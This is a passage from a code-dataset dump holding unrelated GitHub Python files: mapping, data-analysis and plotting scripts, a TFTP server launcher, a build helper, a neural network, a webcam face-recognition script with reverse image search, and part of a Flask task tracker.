\" % (point['cumlength'])))#, point['LABEL'], point['STARTCH'])))\n #, popup=str(point['cumlength'])\n ).add_to(feature_group4)\n \n#use df.apply(,axis=1) to \"iterate\" through every row in your dataframe\ndf2[df2['gullymarker'] ==1].apply(lambda x: plotDot(x), axis = 1)\n\ndf2.iloc[1::20].apply(lambda x: plotChain(x), axis = 1)\n#if df3.shape[0] > df4.shape[0]:\n# df3.iloc[1::10].apply(lambda x: plotChain(x), axis = 1)\n#else:\n# df4.iloc[1::10].apply(lambda x: plotChain(x), axis = 1)\n\ngdf_gullies.apply(lambda x: plotGul(x), axis = 1)\n\nmapa.add_child(feature_group2)\nmapa.add_child(feature_group3)\nmapa.add_child(feature_group4)\nmapa.add_child(folium.map.LayerControl())\n\nfrom folium.plugins import LocateControl\nLocateControl().add_to(mapa)\n\nfolium_static(mapa)\n\nimport matplotlib.pyplot as plt\ndef plotsir(t, S, I, R, add_text):\n f, ax = plt.subplots(1,1,figsize=(10,4))\n ax.plot(t, S, 'b', alpha=0.7, linewidth=2, label='Crossfall')\n ax.plot(t, I, 'y', alpha=0.7, linewidth=2, label='Gradient')\n #ax.plot(t, R, 'g', alpha=0.7, linewidth=2, label='Radius')\n\n ax.set_xlabel('Chainage (m) - ' + add_text)\n ax.set_ylabel('%') # we already handled the x-label with ax1\n ax2 = ax.twinx()\n color = 'tab:blue'\n ax2.set_ylabel('Radius (m)', color=color) # we already handled the x-label with ax1\n #ax2.set_yscale(\"log\")\n ax2.plot(t, R, alpha=0.4, color=color,label='Radius')\n ax2.tick_params(axis='y', labelcolor=color)\n\n ax.yaxis.set_tick_params(length=0)\n ax.xaxis.set_tick_params(length=0)\n ax.grid(b=True, which='major', c='w', lw=2, ls='-')\n legend = ax.legend()\n legend.get_frame().set_alpha(0.5)\n for spine in ('top', 'right', 'bottom', 'left'):\n ax.spines[spine].set_visible(False)\n st.sidebar.pyplot(f)\n\nplotsir(df3['cumlength'], df3['LFAL'], df3['LGRD'], df3['LCRV'], \"LEFT LANE\")\nplotsir(df4['cumlength'], df4['LFAL'], df4['LGRD'], df4['LCRV'], \"RIGHT LANE\")","repo_name":"tomcreer/streamlitdrainage","sub_path":"streamlit_drainage.py","file_name":"streamlit_drainage.py","file_ext":"py","file_size_in_byte":8170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"43103528588","text":"import json\n\n# the latest code of tftpy on Github fixes \"bad file path\" problem on windows\n# but the latest version 0.8.1 on pip doesn't.\n# so i'm directly using this package without pip temporarily\nimport tftpy\n\n\ndef start_tftp_server(path: str, ip: str, port: int):\n server = tftpy.TftpServer(path)\n server.listen(ip, port)\n\n\nif __name__ == \"__main__\":\n with open(\"../properties.json\", \"r\") as fp:\n properties = json.load(fp)\n\n start_tftp_server(\n properties['path'],\n properties['server_ip'],\n properties['tftp_port']\n )\n","repo_name":"mpraiser/js9331_update","sub_path":"js9331_update/tftp_server.py","file_name":"tftp_server.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9141318254","text":"class Mapping_data:\n \n def mean_price_dict(self):\n price_mean_for_each_category = category_elements['Price'].agg(np.mean)\n price_mean_for_each_category_dict = dict(price_mean_for_each_category)\n return price_mean_for_each_category_dict\n \n def mean_downloads_dict(self):\n installs_mean_for_each_category = category_elements['Installs'].agg(np.mean)\n installs_mean_for_each_category_dict = dict(installs_mean_for_each_category)\n return installs_mean_for_each_category_dict\n \n def mean_reviews_dict(self):\n reviews_mean_for_each_category = category_elements['Reviews'].agg(np.mean)\n reviews_mean_for_each_category_dict = dict(reviews_mean_for_each_category)\n return reviews_mean_for_each_category_dict\n \n def mean_rating_dict(self):\n rating_mean_for_each_category = category_elements['Rating'].agg(np.mean)\n rating_mean_for_each_category_dict = dict(rating_mean_for_each_category)\n return rating_mean_for_each_category_dict\n \n def full_rated_apps_dict(self):\n fully_rated_rows = appsData[appsData.Rating==5]\n fullyRatedAppsInCategory = {}\n for i in fully_rated_rows.Category:\n if fullyRatedAppsInCategory.__contains__(i):\n fullyRatedAppsInCategory[i] = fullyRatedAppsInCategory[i] + 1;\n else:\n fullyRatedAppsInCategory[i] = 1;\n fullyRatedAppsInCategory_per = {}\n for i in fully_rated_rows.Category:\n fullyRatedAppsInCategory_per[i] = round(((fullyRatedAppsInCategory[i]\n /no_of_apps_in_category[i])*100), 2)\n return fullyRatedAppsInCategory_per\n \n def apps_rated_below_four_dict(self):\n rating_below_four_in_rows = appsData[appsData.Rating<4]\n below_four_RatedAppsInCategory = {}\n for i in rating_below_four_in_rows.Category:\n if below_four_RatedAppsInCategory.__contains__(i):\n below_four_RatedAppsInCategory[i] = below_four_RatedAppsInCategory[i] + 1;\n else:\n below_four_RatedAppsInCategory[i] = 1;\n below_four_RatedAppsInCategory_per = {}\n for i in category_of_apps:\n below_four_RatedAppsInCategory_per[i] = round(((below_four_RatedAppsInCategory[i]\n /no_of_apps_in_category[i])*100), 2)\n \n return below_four_RatedAppsInCategory_per\n\n def more_than_1M_reviews_dict(self):\n more_than_one_million_reviews = appsData[appsData.Reviews>=1000000]\n more_than_one_million_reviews_in_category = {}\n for i in more_than_one_million_reviews.Category:\n if more_than_one_million_reviews_in_category.__contains__(i):\n more_than_one_million_reviews_in_category[i] = more_than_one_million_reviews_in_category[i] + 1;\n else:\n more_than_one_million_reviews_in_category[i] = 1;\n more_than_one_million_reviews_in_category_per = {}\n for i in more_than_one_million_reviews_in_category:\n more_than_one_million_reviews_in_category_per[i] = round(((more_than_one_million_reviews_in_category[i]/\n no_of_apps_in_category[i])*100), 2)\n return more_than_one_million_reviews_in_category_per\n \n def more_than_1M_downloads_dict(self):\n more_than_one_million_downloads = appsData[appsData.Installs>=1000000]\n more_than_one_million_downloads_in_category = {}\n for i in more_than_one_million_downloads.Category:\n if more_than_one_million_downloads_in_category.__contains__(i):\n more_than_one_million_downloads_in_category[i] = more_than_one_million_downloads_in_category[i] + 1;\n else:\n more_than_one_million_downloads_in_category[i] = 1;\n more_than_one_million_downloads_in_category_per = {}\n for i in category_of_apps:\n more_than_one_million_downloads_in_category_per[i] = round(((more_than_one_million_downloads_in_category[i]\n /no_of_apps_in_category[i])*100), 2)\n return more_than_one_million_downloads_in_category_per\n \n def free_apps_dict(self):\n group_apps_by_category = {}\n for i in category_of_apps:\n group_apps_by_category[i] = appsData[appsData.Category == i]\n no_of_free_apps_in_category = {}\n free = 0\n for i in category_of_apps:\n free = 0\n for j in group_apps_by_category[i].Type:\n if j == \"Free\":\n free+=1\n no_of_free_apps_in_category[i] = free\n no_of_free_apps_in_category_per = {}\n for i in no_of_free_apps_in_category:\n no_of_free_apps_in_category_per[i] = round(((no_of_free_apps_in_category[i]\n /no_of_apps_in_category[i])*100), 2) \n return no_of_free_apps_in_category_per\n \n def paid_apps_dict(self):\n group_apps_by_category = {}\n for i in category_of_apps:\n group_apps_by_category[i] = appsData[appsData.Category == i]\n no_of_paid_apps_in_category = {}\n paid = 0\n for i in category_of_apps:\n paid = 0\n for j in group_apps_by_category[i].Type:\n if j == \"Paid\":\n paid+=1\n no_of_paid_apps_in_category[i] = paid \n no_of_paid_apps_in_category_per = {}\n for i in no_of_paid_apps_in_category:\n no_of_paid_apps_in_category_per[i] = round(((no_of_paid_apps_in_category[i]\n /no_of_apps_in_category[i])*100), 2)\n return no_of_paid_apps_in_category_per\n\n","repo_name":"hidden-tesla/play_store_apps_analysis","sub_path":"Python file/Mapping_data.py","file_name":"Mapping_data.py","file_ext":"py","file_size_in_byte":5855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"19284022440","text":"PRINT = \"Print\"\nINPUT = \"Input\"\nIF = \"Branch\"\n\nWINDOW_NEW = \"창 만들기\"\n# WINDOW_DESTROY = \"Destroy Window\"\nDRAW_TEXT = \"화면에 글��기\"\nSCREEN_CLEAR = \"화면 지우기\"\nDRAW_IMAGE = \"단일 이미지 그리기\"\nDRAW_GROUP = \"스프라이트 그룹 그리기\"\n\nKEY_INPUT = \"키가 눌려있을 때\"\nKEY_NOT_INPUT = \"키가 눌려있지 않을 때\"\nENTRY_POINT = \"시작했을 때\"\nDETECT_COLLISION = \"스프라이트 충돌 때\"\n\nVARIABLE_NEW = \"새 변수\"\nVARIABLE_DEFINE = \"변수 값 정하기\"\nVARIABLE_PLUS = \"변수 값 바꾸기\"\nADD_GROUP = \"스프라이트 묶음\"\nDEFINE_CHARACTER = \"오브젝트 정의하기\"\nPYTHON_NATIVE = \"사용자 지정\"\n\n# ================================================================================================== #\n\n\nALL_VARIABLE_NAME = dir()[0:-8]\n# print(ALL_LEAF_TYPES)\n\nGetNameFromStr = {}\nfor i in range(len(ALL_VARIABLE_NAME)):\n GetNameFromStr[locals()[ALL_VARIABLE_NAME[i]]] = ALL_VARIABLE_NAME[i]\n\nALL_LEAF_TYPES = []\nfor _LEAF_TYPE in ALL_VARIABLE_NAME:\n ALL_LEAF_TYPES.append(locals()[_LEAF_TYPE])\n\n# print(ALL_LEAF_TYPES)\n# print(GetNameFromStr)\n","repo_name":"tdh8316/Guico","sub_path":"contents/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"ko","doc_type":"code","stars":21,"dataset":"github-code","pt":"60"} +{"seq_id":"4714221091","text":"import os\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport numpy as np\r\nimport subprocess\r\nsubprocess.call(['pip', 'install', 'networkx'])\r\nimport networkx as nx\r\n\r\ndef plotting_infections_isolations():\r\n '''\r\n This function creates a visual representation of the COVID-19 Infections and Isolations CSV file\r\n '''\r\n # getting current directory, should be the same where model and the csv file were saved\r\n current_dir = os.getcwd()\r\n # create a folder to store plots\r\n folder_name = 'graphs'\r\n if not os.path.exists(os.path.join(current_dir, folder_name)):\r\n os.mkdir('graphs')\r\n else:\r\n pass\r\n # csv file name\r\n filename = \"Isolation_And_Infection_counts.csv\"\r\n full_path = os.path.join(current_dir, filename)\r\n # get the path to store a generated graph\r\n store_path = os.path.join(current_dir, 'graphs/' + 'COVID-19_infections_and_isolations_graph.png')\r\n df = pd.read_csv(full_path)\r\n np.random.seed(42)\r\n df['date'] = list(pd.date_range('2022-09-26', periods=len(df), freq='D'))\r\n # Create a figure and axis object\r\n fig, ax = plt.subplots(figsize=(12, 6))\r\n # Plot the number of infected people over time\r\n ax.plot(df['date'], df['number_infected'], label='Infected')\r\n # Plot the number of people in isolation over time\r\n ax.plot(df['date'], df['number_isolating'], label='Isolating')\r\n # Calculate the percentage of people in isolation\r\n pct_isolating = df['number_isolating'] / df['number_infected'] * 100\r\n # Plot the dotted line representing the percentage of people in isolation\r\n ax.plot(df['date'], pct_isolating, label='% Isolating', linestyle='--')\r\n # Set x-axis label and title\r\n ax.set_xlabel('Date')\r\n ax.set_title('COVID-19 Infections and Isolations')\r\n # Set y-axis label and legend\r\n ax.set_ylabel('Number of People')\r\n ax.legend()\r\n # Show the plot\r\n # plt.show()\r\n plt.savefig(store_path)\r\n\r\ndef plotting_community_network():\r\n '''\r\n This function creates a visual representation of a community network of spreaders and infected people across different faculties\r\n '''\r\n # getting current directory, should be the same where model and the csv file were saved\r\n current_dir = os.getcwd()\r\n # csv file name\r\n filename = \"Infections_ID.csv\"\r\n full_path = os.path.join(current_dir, filename)\r\n # get the path to store a generated graph\r\n store_path = os.path.join(current_dir, 'graphs/' + 'community_network_graph.png')\r\n df = pd.read_csv(full_path)\r\n np.random.seed(42)\r\n num_top_spreaders = int(input(\"Enter the number of top spreaders you want to be displayed: \"))\r\n df['date'] = list(pd.date_range('2022-09-26', periods=len(df), freq='D'))\r\n # calculate the number of times each spreader appears in the dataset\r\n spreader_counts = df['Spreader_id'].value_counts()\r\n\r\n # pick the most common spreaders from user input\r\n top_spreaders = spreader_counts[:num_top_spreaders].index.tolist()\r\n\r\n # create a graph\r\n G = nx.Graph()\r\n\r\n # add nodes for each spreader and set their size according to the number of infections they caused\r\n for spreader in top_spreaders:\r\n size = spreader_counts[spreader] / 10\r\n G.add_node(spreader, size=size)\r\n\r\n # add edges between spreaders and infected people\r\n for _, row in df.iterrows():\r\n if row['Spreader_id'] in top_spreaders:\r\n G.add_edge(row['Spreader_id'], row['Infected_id'])\r\n\r\n # add node color based on faculty\r\n faculty_colors = {'computing': 'red', 'science': 'blue', 'business': 'green'}\r\n # create a list of node colors based on the faculty of the spreader\r\n node_color_map = []\r\n for node in G.nodes:\r\n if node in df['Spreader_id'].values:\r\n color = faculty_colors.get(df.loc[df['Spreader_id']==node, 'Spreader_faculty'].iloc[0], 'gray')\r\n else:\r\n color = 'gray'\r\n node_color_map.append(color)\r\n\r\n # create a list of node sizes based on the degree of each node\r\n node_size = [deg*100 for node, deg in G.degree()]\r\n\r\n # check that the node size list has the same length as the node color list\r\n if len(node_size) != len(node_color_map):\r\n raise ValueError(\"node_size and node_color_map must have the same length\")\r\n\r\n # draw the graph\r\n pos = nx.spring_layout(G, k=0.3)\r\n nx.draw_networkx_nodes(G, pos, node_size=node_size, node_color=node_color_map)\r\n nx.draw_networkx_edges(G, pos, alpha=0.5)\r\n nx.draw_networkx_labels(G, pos, font_size=8, font_family='sans-serif')\r\n\r\n # add a legend showing what the colors represent\r\n legend = []\r\n for faculty, color in faculty_colors.items():\r\n legend.append(plt.Line2D([], [], color=color, marker='o', markersize=5, label=faculty))\r\n plt.legend(handles=legend)\r\n\r\n # set the axis limits and show the graph\r\n plt.xlim([-1.2,1.3])\r\n plt.ylim([-1.2,1.3])\r\n plt.axis('off')\r\n plt.title('Spreaders and Infected People Community Detection')\r\n #plt.show()\r\n # Save the graph as a PNG file\r\n plt.savefig(store_path)\r\n\r\nif __name__ == '__main__':\r\n\tprint('Creating visual representation of the model\"s performance')\r\n\tplotting_infections_isolations()\r\n\tplotting_community_network()\r\n\tprint('Created. Graphs are contained in the folder graphs.')\r\n\r\n","repo_name":"swiatej/abm-covid-spread","sub_path":"visualisation.py","file_name":"visualisation.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18013094205","text":"## Return the number of times that the string \"code\"\r\n## appears in the given string, except we will accept\r\n## any letter for the 'd', so \"cope\" and \"cooe\" count.\r\n\r\ndef count_code(str):\r\n count = 0\r\n for i in range(len(str)):\r\n if str[i:i+2]==\"co\" and str[i+3:i+4]==\"e\":\r\n count = count + 1\r\n return count\r\n\r\nprint(count_code(\"aaacodebbb\"))\r\nprint(count_code(\"codexxxcode\"))\r\nprint(count_code(\"cozexxxxcope\"))\r\n","repo_name":"sayak-3848/codingbat","sub_path":"String2/count_code.py","file_name":"count_code.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21929279598","text":"from typing import List\n\nfrom dash import html\nfrom dash_spa import register_page, prefix, trigger_index\n\nfrom dash_spa.spa_context import createContext, ContextState, dataclass\nfrom dash_spa.components import DropdownAIO, ButtonContainerAIO\n\nfrom .icons import ICON\n\npage = register_page(__name__, path='/', title=\"Button Test\", short_name='Buttons')\n\n# See assets.css for icon and text styling\n\n@dataclass\nclass MyAppState(ContextState):\n page_size: int = 10\n\nMyAppContext: MyAppState = createContext(MyAppState)\n\nclass PageSizeSelect(ButtonContainerAIO):\n\n className ='dropdown-menu dropdown-menu-xs dropdown-menu-end pb-0'\n\n def __init__(self, page_sizes: List, current:int, id):\n super().__init__(page_sizes, current, id=id, className=PageSizeSelect.className)\n\n state = MyAppContext.getState()\n\n @MyAppContext.On(self.button_match.input.n_clicks)\n def page_select(clicks):\n index = trigger_index()\n if index is not None and clicks[index]:\n state.page_size = int(page_sizes[index])\n\n\n def render_buttons(self, elements):\n state = MyAppContext.getState()\n\n def render_button(text):\n if int(text) == state.page_size:\n element = html.Div([text, ICON.TICK], className='dropdown-item d-flex align-items-center fw-bold')\n else:\n element = html.Div(text, className='dropdown-item fw-bold')\n\n if text == elements[-1]:\n element.className += ' rounded-bottom'\n return element\n\n return [render_button(text) for text in elements]\n\ndef page_size_dropdown(id) -> html.Div:\n pid = prefix(id)\n\n button = DropdownAIO.Button([\n ICON.GEAR,html.Span(\"Toggle Dropdown\", className='visually-hidden')\n ], className='btn btn-link text-dark dropdown-toggle dropdown-toggle-split m-0 p-1')\n\n container = PageSizeSelect([\"10\", \"20\", \"30\"], 0, id=pid('settings_container'))\n dropdown = DropdownAIO(button, container, id=pid('settings_dropdown'))\n\n return html.Div(dropdown)\n\n@MyAppContext.Provider()\ndef layout():\n state = MyAppContext.getState()\n size_dropdown = page_size_dropdown('test')\n h4 = html.H4(f\"Page size is {state.page_size}\", id=\"test_h4\")\n return html.Div([h4, size_dropdown])\n","repo_name":"stevej2608/dash-spa","sub_path":"examples/button_dropdown/pages/button_page.py","file_name":"button_page.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"60"} +{"seq_id":"30161349405","text":"\"\"\"\nbp神经网络\n\nauthor:Cuson\n2019/12/16\n\"\"\"\nimport tensorflow as tf\nfrom tensorflow.contrib import layers\nimport numpy as np\nimport random\n\n# 定义tanh函数\n# def tanh(x):\n# return np.tanh(x)\n# # tanh函数的导数\n# def tan_deriv(x):\n# return 1.0 - np.tanh(x) * np.tan(x)\n#\n# # sigmoid函数\n# def logistic(x):\n# return 1 / (1 + np.exp(-x))\n# # sigmoid函数的导数\n# def logistic_derivative(x):\n# return logistic(x) * (1 - logistic(x))\n\nclass BPNeuralNetwork:\n def __init__(self, inpt, n_in, n_out, activation='tanh'):\n \"\"\"\n 神经网络算法构造函数\n :param layers: 神经元层数\n :param activation: 使用的函数(默认tanh函数)\n :return:none\n \"\"\"\n # if activation == 'logistic':\n # self.activation = logistic\n # self.activation_deriv = logistic_derivative\n # elif activation == 'tanh':\n # self.activation = tanh\n # self.activation_deriv = tan_deriv\n\n with tf.name_scope('params'):\n with tf.name_scope('weights'):\n self.W = tf.Variable(tf.random_normal([n_in, n_out], mean= 0.0, stddev= 1.0, dtype=tf.float32, seed = None,name= None))\n # tf.summary.histogram('weights', self.W)\n # bias\n with tf.name_scope('bias'):\n self.b = tf.Variable(tf.ones([n_out, ]), dtype=tf.float32)\n\n self.output = tf.matmul(inpt, self.W) + self.b\n tf.add_to_collection('predict',self.output)\n self.params = [self.W, self.b]\n\n def cost(self, y):\n \"\"\"\n y: tf.Tensor, the target of the input\n \"\"\"\n # cross_entropy交叉熵\n with tf.name_scope('loss'):\n # clip_by_value(v,min,max) 截取v,max表示为max\n # opt = tf.clip_by_value(self.output, clip_value_min=1e-10, clip_value_max=1.0)\n # softmax_cross_entropy_with_logits(logits,labels,name=None) 相似性概率\n # cost_ = tf.reduce_mean(tf.square(tf.subtract(y ,self.output)))+layers.l2_regularizer(0.01)(self.W)\n cost_=tf.sqrt(tf.losses.mean_squared_error(y,self.output)+layers.l2_regularizer(0.01)(self.W))\n # summary.scalar对标量数据汇总\n tf.summary.scalar('loss', -cost_)\n return cost_\n\n def accuarcy(self, y):\n\n return tf.sqrt(tf.losses.mean_squared_error(y,self.output))","repo_name":"gaoruohan/DBN_predict_performance","sub_path":"BP.py","file_name":"BP.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"60"} +{"seq_id":"73268629632","text":"import sys\nimport os\nimport subprocess\nimport shutil\n\nclass Path:\n\n def __init__(self, directory=None):\n if (directory != None):\n self.path = directory\n self.normalize()\n else:\n self.path = os.getcwd()\n self.normalize()\n\n if (not self.check()):\n msg = \"The supplied path %s is invalid\" % self.path\n raise Exception(msg)\n\n def normalize(self):\n if (sys.platform == \"win32\"):\n self.path = self.path.replace('/', '\\\\')\n else:\n self.path = self.path.replace('\\\\', '/')\n self.path = os.path.abspath(self.path)\n\n def check(self):\n return os.path.exists(self.path)\n\n def __repr__(self) -> str:\n return self.path\n\n def back(self, n=1):\n\n back = self.path\n for i in range(n):\n back = os.path.join(back, \"../\")\n\n return Path(back)\n\n def join(self, directory):\n result = self.path\n return Path(os.path.join(result, directory))\n\n def file(self, path):\n result = self.path\n return os.path.join(result, path)\n\n def create(self, relative):\n result = self.path\n if (sys.platform == \"win32\"):\n relative = relative.replace('/', '\\\\')\n else:\n relative = relative.replace('\\\\', '/')\n\n joinResult = os.path.join(result, relative)\n if (not os.path.isdir(joinResult)):\n os.makedirs(joinResult)\n return Path(joinResult)\n\n def subdir(self, relative):\n result = self.path\n if (sys.platform == \"win32\"):\n relative = relative.replace('/', '\\\\')\n else:\n relative = relative.replace('\\\\', '/')\n\n joinResult = os.path.join(result, relative)\n if (not os.path.isdir(joinResult)):\n msg = \"The path '%s' does not exist \" % joinResult\n raise Exception(msg)\n\n return Path(joinResult)\n\n def recreate(self):\n result = self.path\n\n os.makedirs(result)\n return Path(result)\n\n def remove(self):\n if (os.path.isdir(self.path)):\n print(\"Removing\".ljust(20), \"=> \", self.path)\n shutil.rmtree(self.path, ignore_errors=True)\n\n def copyTo(self, file, toPath):\n print(\"Copy\", self.file(file), \"=> \", toPath.file(file))\n\n shutil.copyfile(self.file(file), toPath.file(file))\n shutil.copymode(self.file(file), toPath.file(file))\n\n def copyTree(self, toPath):\n print(\"Copy\".ljust(20), \"=> \", toPath.path)\n shutil.copytree(self.path, toPath.path, dirs_exist_ok=True)\n\n def removeFile(self, file):\n localFile = os.path.join(self.path, file)\n\n if (os.path.isfile(localFile)):\n print(\"Removing\", localFile)\n os.remove(localFile)\n\n\nclass Builder:\n\n def __init__(self, argc, argv):\n\n self.argc = argc\n self.argv = argv\n self.release = self.findOpt(\"--release\")\n self.opts = {}\n\n sourceDir = Path()\n self.opts['source'] = sourceDir\n self.opts['build'] = sourceDir.create(\"Build\")\n self.opts['deploy'] = sourceDir.create(\"Bin\")\n self.opts['test'] = sourceDir.join(\"Testing\")\n\n if (sys.platform == \"win32\"):\n platName = \"windows\"\n else:\n platName = 'linux'\n\n self.opts['platform'] = platName\n\n def home(self): return self.opts['source']\n def sourceDir(self): return self.opts['source']\n def buildDir(self): return self.opts['build']\n def deployDir(self): return self.opts['deploy']\n\n def dumpOpts(self):\n print(\"\")\n print(\"Build Paths\")\n for k in self.opts.keys():\n print(k.ljust(20), \"=>\", self.opts[k])\n print(\"\")\n\n def goto(self, path):\n try:\n os.chdir(path.path)\n except:\n msg = \"Failed to change working directory to %s\" % path.path\n raise Exception(msg)\n\n def configString(self):\n config = \"Debug\"\n if (self.release):\n config = \"Release\"\n return config\n\n def run(self, cmd):\n print(\"Calling =>\", cmd)\n subprocess.run(cmd, shell=True, env=os.environ)\n\n def findOpt(self, opt):\n for i in range(self.argc):\n if (opt == self.argv[i]):\n return True\n return False\n\n def clean(self, reCreate=False):\n print(\"Cleaning...\".ljust(20), self.argv)\n self.buildDir().remove()\n self.goto(self.home())\n\n def configure(self, reCreate=False):\n print(\"Configure...\".ljust(20), self.argv)\n\n self.goto(self.buildDir())\n self.run(\"cmake ..\")\n self.goto(self.home())\n\n def build(self):\n print(\"Building...\".ljust(20), self.argv)\n self.goto(self.buildDir())\n\n self.run(\"cmake .. -DJam_BUILD_TEST=ON -DJam_AUTO_RUN_TEST=ON \")\n self.run(\"cmake --build %s --config=%s \"%(self.buildDir(), self.configString()))\n self.goto(self.home())\n\n def deploy(self ):\n self.release = True\n self.build()\n\n\n print(\"Deploy...\".ljust(20), self.argv)\n self.goto(self.deployDir())\n self.run(\"windeployqt .\")\n self.goto(self.home())\n \n def edit(self ):\n print(\"Testing...\".ljust(20), self.argv)\n self.goto(self.home())\n\n def logUsage(self):\n print(\"build \")\n print(\"\")\n print(\" Where is one of the following\")\n print(\"\")\n print(\" clean - Removes the build directories\")\n print(\" config - Configure with CMake\")\n print(\" help - Displays this message\")\n print(\" deploy - Build the windows deployment\")\n print(\"\")\n print(\"\")\n\n\ndef main(argc, argv):\n build = Builder(argc, argv)\n build.dumpOpts()\n build.logUsage()\n\n if (build.findOpt(\"clean\")):\n build.clean();\n elif (build.findOpt(\"config\")):\n build.configure();\n elif (build.findOpt(\"deploy\")):\n build.deploy();\n else:\n build.build();\n\n\n build.goto(build.home())\n\nif __name__ == '__main__':\n main(len(sys.argv), sys.argv)\n","repo_name":"csparks78/Jam","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":6119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40445327080","text":"import sys\nimport Update\nfrom ReverseSearch import UploadImage, SearchImage \nimport numpy as np\nimport cv2\nimport face_recognition\nimport json\n\n\nui = UploadImage()\nsi = SearchImage()\n# link = ui.upload(\"rekha.jpeg\")\n# link\n\nknown_face_names, known_face_encodings = Update.update()\n\nfaceCascade = cv2.CascadeClassifier('Models/haarcascade_frontalface_default.xml')\ncap = cv2.VideoCapture(0)\ncap.set(3,1000) # set Width\ncap.set(4,720) # set Height\nwhile True:\n ret, img = cap.read()\n # img = cv2.flip(img)\n img = np.array(img)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n faces = faceCascade.detectMultiScale(\n gray, \n scaleFactor = 1.2,\n minNeighbors = 8,\n minSize = (10, 10)\n # maxSize = (480,480)\n )\n \n for (x,y,w,h) in faces:\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),3)\n roi_gray = gray[y:y+h+1, x:x+w+1]\n roi_color = img[y:y+h+1, x:x+w+1]\n \n cv2.imwrite(\"catch.jpg\", roi_color)\n\n # Load an image with an unknown face\n # unknown_image = face_recognition.load_image_file(\"catch.jpg\")\n\n # Find all the faces and face encodings in the unknown image\n unknown_image = roi_color\n # unknown_image = roi_gray\n # print(type(face_image))\n # face_locations = face_recognition.face_locations(unknown_image)\n\n face_encodings = face_recognition.face_encodings(unknown_image)\n if(len(face_encodings) >= 1):\n face_encodings = face_encodings[0]\n\n # print(face_encodings)\n # print(known_face_encodings)\n matches = face_recognition.compare_faces(known_face_encodings, face_encodings, tolerance=0.62)\n\n name = \"Unknown\"\n\n face_distances = face_recognition.face_distance(known_face_encodings, face_encodings)\n best_match_index = np.argmin(face_distances)\n if matches[best_match_index]:\n name = known_face_names[best_match_index]\n\n # font\n font = cv2.FONT_HERSHEY_SIMPLEX\n \n # org\n org = (x , y + h + 40)\n \n # fontScale\n fontScale = 1.2\n \n # Blue color in BGR\n color = (255, 255, 150)\n \n # Line thickness of 2 px\n thickness = 2\n \n # Using cv2.putText() method\n image = cv2.putText(img, name, org, font, \n fontScale, color, thickness, cv2.LINE_AA)\n\n\n\n cv2.imshow('video',img)\n k = cv2.waitKey(30) & 0xff\n if k == 27: # press 'ESC' to quit\n break\n elif k == ord('f'):\n link = ui.upload(\"catch.jpg\")\n data = si.search(link)\n with open(\"temp.json\", 'w') as f:\n f.write(json.dumps(data, indent = 4))\ncap.release()\ncv2.destroyAllWindows()","repo_name":"srajan-kiyotaka/CoconifiAi-Face-Recognation-Cum-Reverse-Search","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"42317246897","text":"import datetime\nfrom flask import Blueprint, Response, session, request, flash, redirect\n\nfrom task_tracker.forms.task_forms import RegistrationForm, ConfirmUserForm\nfrom task_tracker.mongo.collections import users\nfrom task_tracker.utils.login_helpers.decorators import login_required, not_logged_in\nfrom task_tracker.utils.login_helpers.login_utils import set_redis_session, generate_hash, login_user\nfrom task_tracker.utils.response_utils import render_template\nfrom task_tracker.utils.utils import is_user_exists, add_new_user, confirm_token\nfrom task_tracker import login_manager\n\ndashboard_app = Blueprint(__name__, __name__)\n\n@dashboard_app.route(\"/user/dashboard\")\n@login_required\ndef user_dashboard():\n \"\"\"\n Display Dahsboard of the user\n :return:\n \"\"\"\n return Response('

User area {0}

'.format(session.get(\"email\")))\n\n\n@dashboard_app.route(\"/admin/dashboard\")\n@login_required\ndef admin_dashboard():\n \"\"\"\n Display dashboard of the admin\n :return:\n \"\"\"\n return render_template(\"sadashboard.html\")\n\n\n@dashboard_app.route(\"/admin/add/user\", methods=[\"GET\", \"POST\"])\n@login_required\ndef add_user():\n \"\"\"\n Display dashboard of the admin\n :return:\n \"\"\"\n form = RegistrationForm()\n if request.method == \"POST\":\n if form.validate_on_submit():\n form_data = request.form.to_dict()\n if not is_user_exists(form_data):\n add_new_user(form_data)\n return render_template(\"confirmation.html\", form=form)\n return render_template(\"add_user.html\", errors=\"User Exists\", form=form)\n return render_template(\"add_user.html\", form=form)\n return render_template(\"add_user.html\", form=form)\n\n\n@dashboard_app.route(\"/admin/delete/user\", methods=[\"GET\", \"POST\"])\n@login_required\ndef delete_user():\n \"\"\"\n Display dashboard of the admin\n :return:\n \"\"\"\n return render_template(\"sadashboard.html\")\n\n\n@dashboard_app.route('/confirm_email/', methods=['GET', 'POST'])\n@not_logged_in\ndef confirm_email(token):\n form = ConfirmUserForm()\n email = ''\n\n try:\n email = confirm_token(token)\n except:\n flash('The confirmation link is invalid or has expired.', 'danger')\n return redirect('/')\n\n if not email:\n flash('The confirmation link is invalid or has expired.', 'danger')\n return redirect('/')\n\n user = users.find_one({'email': email})\n if user['is_active']:\n flash('Account already confirmed. Please login.', 'success')\n return redirect('/login')\n\n if request.method == \"POST\":\n if form.validate_on_submit():\n users.update({'email': email}, {'$set': {\n 'is_active': True,\n 'confirmed_on': datetime.datetime.utcnow(),\n 'password': 